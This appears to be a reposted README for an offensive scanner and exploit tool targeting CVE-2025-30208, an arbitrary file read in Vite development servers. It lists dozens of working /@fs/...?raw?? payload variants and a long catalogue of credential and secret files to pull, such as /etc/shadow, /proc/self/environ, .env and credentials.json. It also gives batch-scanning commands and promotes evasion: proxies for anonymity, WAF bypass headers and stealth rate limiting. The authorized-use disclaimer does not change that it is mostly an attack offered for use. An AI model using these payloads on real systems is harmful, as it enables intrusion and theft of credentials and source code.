Share
## https://sploitus.com/exploit?id=7DB02D74-4971-549C-B89D-1F320A7D2880
# ๐ฅ CVE-2025-30208 Vite Arbitrary File Read Vulnerability Scanner
<div align="center">
**Advanced vulnerability scanner for CVE-2025-30208 with enterprise-grade features**
*Professional penetration testing tool for Vite Arbitrary File Read vulnerability detection*
[๐ Quick Start](#-quick-start) โข [๐ Features](#-features) โข [๐ง Usage](#-usage) โข [๐ Examples](#-examples) โข [๐ก๏ธ Security](#๏ธ-security)
</div>
---
## ๐ Overview
This is a comprehensive vulnerability scanner designed to detect and exploit the **CVE-2025-30208** vulnerability in Vite development servers. The vulnerability allows arbitrary file read access through Vite's file system endpoints, potentially exposing sensitive configuration files, source code, and system information.
### ๐ฏ What This Tool Does
- **Detects** vulnerable Vite instances across networks
- **Exploits** the arbitrary file read vulnerability safely
- **Discovers** sensitive files and configuration data
- **Reports** findings in multiple formats (HTML, JSON, Console)
- **Manages** scanning sessions and configurations
- **Handles** errors gracefully with automatic retry mechanisms
### ๐๏ธ Modular Architecture
The tool now features a **modular architecture** for better maintainability and extensibility:
- **`CVE-2025-30208.py`** - Main scanner application
- **`payloads.py`** - Advanced exploitation payloads (60+ variations)
- **`sensitive_files.py`** - Comprehensive sensitive file database (200+ files)
- **`html_template.py`** - Enhanced hacker-style HTML reporting template
---
## ๐ Quick Start
### Prerequisites
```bash
pip3 install -r requirements.txt
```
### Basic Usage
```bash
python3 CVE-2025-30208.py
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run
```
---
## ๐ Features
### ๐ Core Vulnerability Detection
- **60+ Advanced Payloads**: Comprehensive exploitation techniques for maximum detection
- **Smart Detection**: Intelligent response analysis to avoid false positives
- **Real-time Validation**: Continuous validation of target responses
- **Comprehensive Testing**: Tests all known vulnerable endpoints
### ๐ก๏ธ Enhanced Security Features
- **Proxy Support**: HTTP/HTTPS proxy configuration for anonymity
- **Custom Headers**: Bypass WAF/IPS with custom HTTP headers
- **Rate Limiting**: Configurable delays to avoid detection
- **Session Management**: Save and restore scanning sessions
- **Input Validation**: Comprehensive parameter validation
### ๐ง Advanced Capabilities
- **Batch Scanning**: Multi-threaded scanning of multiple targets
- **Sensitive File Discovery**: Automated discovery of 200+ sensitive files
- **Connectivity Testing**: TCP/UDP/HTTP/HTTPS protocol testing
- **Error Recovery**: Automatic retry with exponential backoff
- **Comprehensive Logging**: Detailed logs with timestamps
### ๐ Reporting & Output
- **๐จ Enhanced HTML Reports**: Beautiful hacker-style vulnerability reports with animations
- **JSON Export**: Structured data for further analysis
- **Console Output**: Color-coded real-time feedback
- **Log Files**: Detailed audit trails
- **Interactive Web Interface**: Built-in web server for viewing reports
---
## ๐ง Usage Guide
### 1. Basic Configuration
```bash
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > set FILEPATH etc/passwd
CVE-2025-30208 > test
```
### 2. Vulnerability Testing
```bash
CVE-2025-30208 > run
# Enable verbose mode for detailed output
CVE-2025-30208 > verbose
CVE-2025-30208 > run
```
### 3. Batch Scanning
```bash
CVE-2025-30208 > set THREADS 10
CVE-2025-30208 > batch
192.168.1.100:3000
192.168.1.101:3000
192.168.1.102:3000
[Press Enter twice to finish]
```
### 4. Sensitive File Discovery
```bash
CVE-2025-30208 > scan
```
### 5. Advanced Configuration
```bash
# Configure proxy
CVE-2025-30208 > proxy
Enter proxy: http://127.0.0.1:8080
# Set custom headers
CVE-2025-30208 > headers
Enter headers: {"User-Agent": "Custom Scanner"}
# Configure rate limiting
CVE-2025-30208 > rate
Enter rate limit: 1.0
```
### 6. Enhanced HTML Reporting
```bash
# Generate beautiful HTML report
CVE-2025-30208 > pull
# Start web server to view report
CVE-2025-30208 > web
# Start web server on specific port
CVE-2025-30208 > web 8081
# Stop web server
CVE-2025-30208 > web off
```
---
## ๐ Command Reference
| Command | Description | Example |
|---------|-------------|---------|
| `set <option> <value>` | Set configuration options | `set RHOST 192.168.1.100` |
| `show options` | Display current settings | `show options` |
| `edit` | Interactive option editor | `edit` |
| `run` / `exploit` | Run vulnerability test | `run` |
| `batch` | Batch scan multiple targets | `batch` |
| `scan` | Discover sensitive files | `scan` |
| `pull` | Export results to HTML/JSON | `pull` |
| `web [on\|off\|port]` | Web server for HTML reports | `web 8080` |
| `save` | Save session configuration | `save` |
| `load` | Load session configuration | `load` |
| `test` | Test connectivity to target | `test` |
| `validate` | Validate current configuration | `validate` |
| `verbose` | Toggle verbose mode | `verbose` |
| `proxy` | Configure proxy settings | `proxy` |
| `headers` | Set custom HTTP headers | `headers` |
| `rate` | Configure rate limiting | `rate` |
| `log` | Show logging information | `log` |
| `help` / `?` | Show help | `help` |
| `exit` / `quit` | Exit tool | `exit` |
---
## โ๏ธ Configuration Options
| Option | Description | Default | Validation |
|--------|-------------|---------|------------|
| `RHOST` | Target host/IP address | - | Hostname/IP validation |
| `RPORT` | Target port number | - | Port range (1-65535) |
| `FILEPATH` | File path to test | `etc/passwd` | Path validation |
| `PROXY` | HTTP/HTTPS proxy URL | - | URL format validation |
| `VERBOSE` | Enable verbose output | `false` | Boolean validation |
| `RATE_LIMIT` | Delay between requests (seconds) | `0.3` | Numeric validation |
| `THREADS` | Number of threads for batch scanning | `5` | Integer validation |
| `TIMEOUT` | Request timeout (seconds) | `5` | Integer validation |
| `CUSTOM_HEADERS` | Custom HTTP headers (JSON) | `{}` | JSON format validation |
---
## ๐จ Enhanced Payload System
The scanner now uses **60+ different payload variations** organized in `payloads.py`:
### Primary @fs Payloads
```bash
/@fs/{file_path}?raw??
/@fs/{file_path}?raw&url
/@fs/{file_path}?import&raw??
/@fs/{file_path}?raw&import
/@fs/{file_path}?import&url
```
### Extended Parameter Variations
```bash
/@fs/{file_path}?raw&source
/@fs/{file_path}?raw&content
/@fs/{file_path}?raw&data
/@fs/{file_path}?raw&file
/@fs/{file_path}?raw&type=text
/@fs/{file_path}?raw&format=text
/@fs/{file_path}?raw&encoding=utf8
```
### Vite-Specific Variations
```bash
/@fs/{file_path}?raw&vite&dev
/@fs/{file_path}?raw&vite&hot
/@fs/{file_path}?raw&vite&hmr
/@fs/{file_path}?raw&development
/@fs/{file_path}?raw&debug
```
### Module System Variations
```bash
/@fs/{file_path}?raw&esm
/@fs/{file_path}?raw&cjs
/@fs/{file_path}?raw&umd
/@fs/{file_path}?raw&js
/@fs/{file_path}?raw&ts
/@fs/{file_path}?raw&json
/@fs/{file_path}?raw&css
/@fs/{file_path}?raw&html
```
### Alternative Endpoints
```bash
/app/{file_path}?raw??
/App/{file_path}?raw??
```
---
## ๐ Enhanced Sensitive File Discovery
The tool now tests for **200+ sensitive files** organized in `sensitive_files.py`:
### ๐ฅ๏ธ System Files (Linux/Unix)
- `/etc/passwd` - User account information
- `/etc/shadow` - Encrypted password data
- `/etc/services` - Network services
- `/etc/hosts` - Hostname mappings
- `/etc/fstab` - File system table
- `/etc/ssh/sshd_config` - SSH server configuration
- `/etc/crontab` - System cron jobs
- `/etc/sudoers` - Sudo configuration
### ๐ Process Information
- `/proc/version` - Kernel version
- `/proc/cpuinfo` - CPU information
- `/proc/meminfo` - Memory information
- `/proc/self/environ` - Process environment
- `/proc/self/cmdline` - Process command line
- `/proc/net/tcp` - TCP connections
- `/proc/net/udp` - UDP connections
### โ๏ธ Application Configuration
- `.env` - Environment variables
- `.env.local` - Local environment
- `.env.production` - Production environment
- `config.json` - Application configuration
- `settings.json` - Application settings
- `application.properties` - Spring configuration
- `application.yml` - YAML configuration
- `database.yml` - Database configuration
- `secrets.json` - Secret management
### ๐ฆ Node.js / JavaScript Files
- `package.json` - Node.js dependencies
- `package-lock.json` - Locked dependencies
- `yarn.lock` - Yarn lock file
- `vite.config.js` - Vite configuration
- `vite.config.ts` - TypeScript Vite config
- `tsconfig.json` - TypeScript configuration
- `webpack.config.js` - Webpack configuration
- `next.config.js` - Next.js configuration
- `nuxt.config.js` - Nuxt.js configuration
- `angular.json` - Angular configuration
- `vue.config.js` - Vue.js configuration
- `rollup.config.js` - Rollup configuration
- `eslint.config.js` - ESLint configuration
- `prettier.config.js` - Prettier configuration
- `jest.config.js` - Jest configuration
- `babel.config.js` - Babel configuration
- `tailwind.config.js` - Tailwind CSS configuration
### ๐ง Git Files
- `.git/config` - Git configuration
- `.gitignore` - Git ignore rules
- `.gitattributes` - Git attributes
- `.gitmodules` - Git submodules
- `.git/HEAD` - Current branch
- `.git/logs/HEAD` - Git logs
- `.git/refs/heads/master` - Master branch
- `.git/refs/heads/main` - Main branch
### ๐ Documentation Files
- `README.md` - Project documentation
- `CHANGELOG.md` - Change log
- `LICENSE` - License information
- `CONTRIBUTING.md` - Contribution guidelines
- `AUTHORS` - Author information
- `TODO.md` - Todo list
- `ROADMAP.md` - Development roadmap
### ๐ณ Docker Files
- `Dockerfile` - Docker configuration
- `docker-compose.yml` - Docker Compose
- `docker-compose.override.yml` - Override configuration
- `.dockerignore` - Docker ignore rules
- `docker-compose.prod.yml` - Production configuration
- `docker-compose.dev.yml` - Development configuration
### ๐ Web Server Configuration
- `nginx.conf` - Nginx configuration
- `apache2.conf` - Apache configuration
- `httpd.conf` - HTTP daemon config
- `.htaccess` - Apache access control
- `web.config` - IIS configuration
- `robots.txt` - Search engine directives
- `sitemap.xml` - Site structure
- `manifest.json` - Web app manifest
- `sw.js` - Service worker
- `firebase.json` - Firebase configuration
- `firebase.rules` - Firebase security rules
### ๐ช Windows Files
- `boot.ini` - Boot configuration
- `autoexec.bat` - Auto-execution script
- `system.ini` - System configuration
- `win.ini` - Windows configuration
- `Users` - User directories
- `Windows` - System files
- `Program Files` - Application directories
### ๐ macOS Files
- `System` - System files
- `Library` - Library files
- `Applications` - Application files
- `private/etc/hosts` - Hosts file
- `private/etc/passwd` - User accounts
### ๐๏ธ Database Files
- `database.db` - SQLite database
- `database.sqlite` - SQLite database
- `data.db` - Data database
- `dump.sql` - Database dump
- `schema.sql` - Database schema
- `migrations` - Database migrations
### ๐ Log Files
- `logs` - Log directory
- `error.log` - Error logs
- `access.log` - Access logs
- `app.log` - Application logs
- `debug.log` - Debug logs
- `combined.log` - Combined logs
### ๐พ Backup Files
- `backup` - Backup directory
- `backup.sql` - Database backup
- `backup.zip` - Compressed backup
- `dump` - Data dump
- `export` - Data export
### ๐ Security & Authentication
- `auth.json` - Authentication configuration
- `credentials.json` - Credential storage
- `keys.json` - Key management
- `tokens.json` - Token storage
- `jwt.json` - JWT configuration
- `oauth.json` - OAuth configuration
### ๐ API & Service Files
- `api.json` - API configuration
- `swagger.json` - API documentation
- `openapi.json` - OpenAPI specification
- `graphql.json` - GraphQL configuration
- `schema.json` - API schema
### โ๏ธ Cloud & Deployment
- `cloudformation.yml` - AWS CloudFormation
- `serverless.yml` - Serverless configuration
- `terraform.tf` - Terraform configuration
- `kubernetes.yml` - Kubernetes configuration
- `k8s.yml` - Kubernetes configuration
### ๐ Monitoring & Analytics
- `analytics.json` - Analytics configuration
- `monitoring.json` - Monitoring setup
- `metrics.json` - Metrics configuration
- `telemetry.json` - Telemetry data
---
## ๐จ Enhanced HTML Reporting
The tool now generates **beautiful hacker-style HTML reports** with:
### โจ Visual Features
- **Matrix-style background** with animated falling characters
- **Gradient animations** and glowing effects
- **Interactive elements** with hover effects
- **Responsive design** for all devices
- **Dark theme** optimized for security professionals
### ๐ Interactive Statistics
- **Real-time counters** for total leaks and bytes exposed
- **Severity indicators** with color coding
- **Copy functionality** for each leak
- **Content preview** with size and line count
- **Expandable sections** for detailed analysis
### ๐ง Technical Features
- **Google Fonts integration** (JetBrains Mono, Orbitron)
- **CSS animations** and transitions
- **JavaScript interactivity** for enhanced UX
- **Mobile-responsive** design
- **Cross-browser compatibility**
### ๐ Web Server Integration
- **Built-in HTTP server** for viewing reports
- **Automatic browser opening**
- **Port configuration** options
- **Easy start/stop** commands
---
## ๐ก๏ธ Error Handling & Recovery
### Automatic Retry Mechanism
- **3 Retry Attempts**: Failed requests are automatically retried
- **Exponential Backoff**: Increasing delays between retries
- **Smart Error Classification**: Different handling for different error types
- **Graceful Recovery**: Tool continues operation after errors
### Error Categories
- **NetworkError**: Connection, timeout, proxy issues
- **ConfigurationError**: Invalid settings and parameters
- **ValidationError**: Invalid input parameters
- **ScannerError**: General scanner errors
### Validation Features
- **Real-time Input Validation**: All parameters validated before use
- **Configuration Validation**: Complete validation before scanning
- **Connectivity Testing**: TCP/UDP/HTTP/HTTPS protocol testing
- **Proxy Validation**: Proxy URL format validation
---
## ๐ Output Files
| File | Description | Format |
|------|-------------|--------|
| `data_leak.html` | Enhanced hacker-style HTML vulnerability report | HTML |
| `data_leak.json` | Structured JSON export | JSON |
| `sensitive_files_discovery.json` | Discovered sensitive files | JSON |
| `session.json` | Saved session configuration | JSON |
| `logs/cve_2025_30208_YYYYMMDD_HHMMSS.log` | Detailed audit logs | Text |
---
## ๐ Affected Versions
### ๐จ Vulnerable Versions
```
6.2.0 โค Vite โค 6.2.2
6.1.0 โค Vite โค 6.1.1
6.0.0 โค Vite โค 6.0.11
5.0.0 โค Vite โค 5.4.14
Vite โค 4.5.9
```
### โ
Unaffected Versions
```
Vite โฅ 6.2.3
6.1.2 โค Vite < 6.2.0
6.0.12 โค Vite < 6.1.0
5.4.15 โค Vite < 6.0.0
4.5.10 โค Vite < 5.0.0
```
---
## ๐ก๏ธ Security & Ethical Usage
### โ ๏ธ Important Security Notes
- **Authorized Testing Only**: Use only on systems you own or have explicit permission to test
- **Responsible Disclosure**: Report vulnerabilities to system owners
- **Rate Limiting**: Use appropriate delays to avoid overwhelming targets
- **Proxy Usage**: Consider using proxies for anonymity when appropriate
- **Legal Compliance**: Ensure compliance with local laws and regulations
### ๐ Best Practices
- Always obtain written permission before testing
- Use in controlled environments only
- Document all testing activities
- Respect rate limits and system resources
- Report findings responsibly
---
## ๐ Advanced Usage Examples
### Example 1: Comprehensive Network Scan
```bash
CVE-2025-30208 > set THREADS 20
CVE-2025-30208 > set RATE_LIMIT 0.5
CVE-2025-30208 > set TIMEOUT 10
CVE-2025-30208 > verbose
CVE-2025-30208 > batch
```
### Example 2: Stealth Scanning with Proxy
```bash
CVE-2025-30208 > proxy
Enter proxy: http://127.0.0.1:8080
CVE-2025-30208 > headers
Enter headers: {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"}
CVE-2025-30208 > set RATE_LIMIT 2.0
CVE-2025-30208 > run
```
### Example 3: Enhanced Reporting Workflow
```bash
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run
CVE-2025-30208 > pull
CVE-2025-30208 > web 8080
```
### Example 4: Sensitive File Discovery
```bash
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > scan
```
---
## ๐๏ธ Project Structure
```
CVE-2025-30208/
โโโ CVE-2025-30208.py # Main scanner application
โโโ payloads.py # Advanced exploitation payloads (60+)
โโโ sensitive_files.py # Sensitive file database (200+)
โโโ html_template.py # Enhanced HTML reporting template
โโโ README.md # This documentation
โโโ requirements.txt # Python dependencies
โโโ logs/ # Log files directory
โโโ data_leak.html # Generated HTML reports
โโโ data_leak.json # Generated JSON reports
โโโ session.json # Saved session configurations
```
---
## ๐ค Contributing
We welcome contributions to improve this tool:
1. **Fork** the repository
2. **Create** a feature branch
3. **Make** your changes
4. **Test** thoroughly
5. **Submit** a pull request
### Contribution Areas
- New payload variations in `payloads.py`
- Additional sensitive file patterns in `sensitive_files.py`
- Enhanced HTML templates in `html_template.py`
- Improved error handling
- Performance optimizations
- Documentation improvements
---
## ๐ License
This project is licensed for **educational and authorized security testing purposes only**.
**โ ๏ธ Legal Disclaimer**: This tool is intended for authorized security testing and research purposes only. Users are responsible for ensuring they have proper authorization before testing any systems. The authors are not responsible for any misuse of this tool.
---
## ๐จโ๐ป Author
<div align="center">
**ThemeHackers**
[](https://github.com/ThemeHackers)
*Security Researcher & Penetration Tester*
</div>
---
<div align="center">
**โญ If this tool helped you, please give it a star! โญ**
*Built with โค๏ธ for the security community*
</div>